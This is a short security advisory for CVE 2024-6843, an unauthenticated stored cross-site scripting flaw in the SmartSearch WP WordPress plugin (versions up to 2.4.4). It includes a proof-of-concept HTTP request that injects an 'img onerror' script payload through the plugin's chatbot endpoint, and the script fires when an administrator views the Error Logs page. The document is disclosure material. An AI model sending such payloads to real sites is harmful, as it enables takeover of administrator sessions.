SmartSearch WP <= 2.4.4 – Unauthenticated Stored XSS | CVE 2024-6843

Description

The plugin does not sanitise and escape user inputs, which could allow unauthenticated users to perform Stored Cross-Site Scripting attacks against admins

Proof of Concept

Note: The plugin must have an active OpenAI API key to exploit this

Submit an XSS payload via the chatbot (unauthenticated):

```
POST /wp-json/wdgpt/v1/retrieve-prompt HTTP/1.1
Host: 192.168.178.143
Content-Length: 194
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: http://192.168.178.143
Referer: http://192.168.178.143/2024/06/17/hello-world/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

{
  "question": "<img src=x onerror=alert(10)>",
  "conversation": [
    {
      "text": "<img src=x onerror=alert(10)>",
      "role": "user",
      "date": "2024-06-21T16:25:10.873Z"
    }
  ],
  "unique_conversation": "7wenbi3tgqglxowj6oo"
}
```
Payload will get automatically triggered when an authenticated user navigates to SmartSearch WP > Error Logs:

(URL: http://example.com/wp-admin/admin.php?page=wdgpt_error_logs)

-----------------------------------------------------------------------